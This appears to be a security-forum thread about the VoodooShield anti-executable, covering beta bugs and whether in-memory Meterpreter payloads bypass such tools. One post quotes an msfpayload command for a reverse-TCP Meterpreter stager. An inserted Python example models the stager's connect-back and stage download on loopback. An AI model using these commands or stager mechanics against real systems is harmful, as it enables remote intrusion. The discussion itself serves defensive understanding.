VoodooShield ?

Discussion in 'other anti-malware software' started by CloneRanger, Dec 7, 2011.

  1. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Thank you, and obviously we appreciate this very much too ;).
     
  2. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    13,790
    Location:
    The Netherlands
    Can you tell a bit more about this, isn't this in fact comparable with in-memory malware? The payload (meterpreter) works from inside the exploited process, and that's why anti-exe can't block it, am I correct?
     
  3. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Do you guys maybe want to start a new thread and have a general discussion about this? I do think it is an important topic to discuss, but I think if we start a new thread, other developers will be more comfortable in joining the conversation and offering their valuable insights? Just a thought!
     
  4. schmidthouse

    schmidthouse Registered Member

    Joined:
    Aug 18, 2015
    Posts:
    26
    Location:
    Sunny Okanagan Valley Canada
    Curious, is there an 'envisioned' timetable for when release version 3 will be available through GUI upgrade from v. 2.75 (i.e. weeks, months, a year)?
     
  5. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Vlad will be able to give you a better idea than I can when he returns from vacation, but I imagine a month or so. Thank you!
     
  6. Triple Helix

    Triple Helix Specialist

    Joined:
    Nov 20, 2004
    Posts:
    12,991
    Location:
    Ontario, Canada
    Dan look for an email!

    Daniel ;)
     
  7. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    13,790
    Location:
    The Netherlands
    There is already a thread over here:

    https://www.wilderssecurity.com/thre...r-edetection-any-antimalware-software.379698/
     
  8. schmidthouse

    schmidthouse Registered Member

    Joined:
    Aug 18, 2015
    Posts:
    26
    Location:
    Sunny Okanagan Valley Canada
    No, Thank you!
     
  9. hjlbx

    hjlbx Guest

    This is not unusual behavior for any AV. The log is not showing the complete details.

    Right now, there is a problem with VS not recording complete command lines (e.g. VS does not log all blocked command lines, and there is no real-time list of command lines).

    There is a problem with VS not alerting the user about block actions in some instances.

    There is no way to look up blocks and white-list them if legitimate (e.g. select a command line block from a real-time list and add it to the white list).

    Big usability problem...
     
  10. hjlbx

    hjlbx Guest

    No. Someone needs to provide a verifiable sample or PoC... because until someone can prove a bypass with an actual sample - that is verified by others via testing - it is nothing but speculation. Another discussion is going to only degenerate into another messy debate and verbal melee \ flame war...
     
  11. Baldrick

    Baldrick Registered Member

    Joined:
    May 11, 2002
    Posts:
    2,561
    Location:
    South Wales, UK
    Completely agree with that...and as you say best we avoid going any further with discussions along those lines.
     
  12. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    4,306
    Location:
    Under a bushel ...
    Win 7 - VS in Smart Mode.
    I get one of these whenever I open Explorer? (attachment: VS.png)
    Edit: 3.02 Beta
     
    Last edited: Oct 9, 2015
  13. TNO_sec

    TNO_sec Registered Member

    Joined:
    Sep 26, 2010
    Posts:
    47
    Basically yes, except Metasploit Meterpreter does not need any actual malware. Hence there is no file being executed and nothing for an anti-executable to detect.

    With that said, I agree with Dan that if more debate about this is needed, it should be done in a new thread. Please point me to it if you decide to create one.

    For those still asking for “proof”, I'll copy-paste my previous reply #8052:
    “To those wanting some sort of "proof" I will point out that this method is nothing fancy. It's out there for all to see. It's basically just how a Metasploit interpreter works. Metasploit is built into Kali Linux, which is completely free, so anyone who knows how to use Metasploit should be able to reproduce it. Not that I see why it would be needed. After all, when there is no executable, how is an anti-executable supposed to block the attack?”
     
  14. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,269
    Location:
    U.S.A.
    Great article here on explaining how Meterpreter works: https://www.sans.org/reading-room/whitepapers/forensics/analysis-meterpreter-post-exploitation-35537

    -EDIT- The key to stopping this is detecting the stager. After that it's game over, since everything thereafter is done in memory.

    Analysis began with the stager, which was created by the msfpayload utility shown below. This command will embed a Metasploit payload into several formats including code such as C and JS as well as executables and DLLs. The stager executable is small, just over 70K, regardless of the transport method selected.

    root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.36.128 LPORT=9002 X > ./payloads/meterpreter_reverse_tcp.exe

    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 287
    Options: {"LHOST"=>"192.168.36.128", "LPORT"=>"9002"}

     
    Last edited: Oct 9, 2015
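    Added example (not from the SANS paper, not posted by itman or TNO_sec, and not VoodooShield code): the staging step that the two posts above are describing, modelled in Python. The classic windows/meterpreter/reverse_tcp stager connects back to LHOST:LPORT, reads a 4-byte little-endian length from the handler, receives that many bytes of stage into memory it allocated itself, and jumps into it; nothing beyond the tiny stager ever exists as a file. Here both sides run against each other on loopback, the "stage" is a constructed byte string, and the receiving side only stores the bytes (it never maps or executes them). The function names, the 16 MiB sanity cap and the sample stage are assumptions of this example, not part of Metasploit.

```python
import socket
import struct
import threading

# Constructed stand-in for the second stage (in a real run this would be the
# meterpreter DLL). Any bytes will do because this model never executes them.
CONSTRUCTED_STAGE = bytes(range(256)) * 8

# Assumed cap so the model refuses absurd lengths; the real stager has no such check.
MAX_STAGE = 16 * 1024 * 1024


def handler_serve(listener, stage):
    """Handler side: accept one connection and send <u32 little-endian length><stage>.

    This is the shape of what the Metasploit handler sends to a reverse_tcp stager.
    """
    conn, _addr = listener.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock, n):
    """recv() may return short reads; loop until exactly n bytes have arrived."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the full stage arrived")
        buf += chunk
    return bytes(buf)


def stager_fetch(host, port, max_stage=MAX_STAGE):
    """Stager side: connect back, read the length prefix, then read the stage.

    The real stager allocates an RWX buffer and jumps into it; here the stage is
    simply returned, so nothing is executed and nothing is written to disk.
    """
    with socket.create_connection((host, port), timeout=5) as s:
        (length,) = struct.unpack("<I", recv_exact(s, 4))
        if length > max_stage:
            raise ValueError(f"stage length {length} exceeds cap of {max_stage}")
        return recv_exact(s, length)


def run_staging_demo(stage=CONSTRUCTED_STAGE, max_stage=MAX_STAGE):
    """Run handler and stager against each other on loopback.

    Returns the bytes the stager ends up holding in memory.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.settimeout(5)
    listener.bind(("127.0.0.1", 0))  # ephemeral port stands in for LPORT
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=handler_serve, args=(listener, stage), daemon=True)
    t.start()
    try:
        return stager_fetch("127.0.0.1", port, max_stage=max_stage)
    finally:
        t.join(timeout=5)
        listener.close()


if __name__ == "__main__":
    got = run_staging_demo()
    print(f"stager holds {len(got)} bytes in memory; matches handler: {got == CONSTRUCTED_STAGE}")
```

    The point for the anti-executable debate is visible in the code: the only artefact on disk is whatever carried `stager_fetch` (a 70K exe in the SANS example, or nothing at all when the stager is delivered by an exploit); the stage arrives over the socket straight into a buffer. Detection therefore has to happen at the stager (file or network connect-back), not at the stage.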
  15. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
  16. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Not surprising. Anyone using a smart phone is already infected by stuff that allows all the snoops to turn on the microphone when the phone is off, and listen to what is being said. Only solution is to go back to the days when a cellphone was just a phone, and not "smart". Not likely to happen.
     
  17. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,269
    Location:
    U.S.A.
    I still use my 12-year-old pay-as-you-go Verizon cell phone. All I have to do is pay at least $5 a month and I keep all my rollover minutes. Actually, it still has the original battery in the thing. It has excellent reception all over the U.S.
     
  18. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Or they can lock the device while a web app is running, right ;).
     
  19. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Yeah, that would be even better!
     
  20. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Sorry about that... Vlad will be back tomorrow and he will most likely focus on the command lines. Do you guys remember how I had a difficult time getting the command lines just right? And actually, I never did get them just right in VS 2.86. So the command lines are kind of in a transition while he reworks the code, so it may take a week or two to work everything out and get them working perfectly.
     
  21. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Yeah, it will be a very interesting discussion, hopefully with a healthy dose of PoC's. I really would like to see what other developers and exploit experts think as well.
     
  22. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Yeah, it is essentially the same thing as the cmd issue that I could never get exactly right, but he will fix it, I promise ;).
     
  23. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Nope. You can turn it off and the spooks can turn on the microphone and listen. No POC's on this stuff. It's the "BIG" boys.
     
  24. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    I am talking about executable malware, like the example in the video that I posted... in the video, she says “One thing to remember is that these infections got on these iPhones by users clicking on a link to download an app to their iPhone, not from users downloading things from the App Store.”

    In iOS, Apps must be approved for the camera and mic to have access. Whether this can be exploited or not, who knows?

    If turning the lock off is a concern, then you either add an additional deny by default prompt, or just hide the desktop shield gadget altogether (for novices).

    Either way, I believe that the device should be locked when a web app is running, and unlocked when all of the web apps are closed, so that the device is usable. Keep in mind, the lock can include other locking mechanisms other than whitelisting... like anti-exploit, etc, but the core locking mechanism should be whitelisting in my opinion. Also, keep in mind, currently iOS 8 and below essentially blocks any apps that are not provided by the app store, which is not unlike blocking by digital signature... which is exactly why VS does not allow by digital signature, unless the initial parent process is allowed.

    According to the video, it sounds like Apple added additional protections in iOS 9, so for now this issue is fixed... so I would be curious what these protections are, and how effective they are compared to whitelisting and auto building the whitelist with toggling / snapshots.
     
    Last edited: Oct 10, 2015
  25. singularity

    singularity Registered Member

    Joined:
    Mar 6, 2014
    Posts:
    76
    Location:
    India
    I am on 3.02 beta, whitelisted and took a snapshot, but whenever I right-click to open the folder in Internet Download Manager for a downloaded item, I get this. I have allowed it n times.
    http://nium.co/images/f429afaebc.png
    Should I whitelist rundll in settings?
     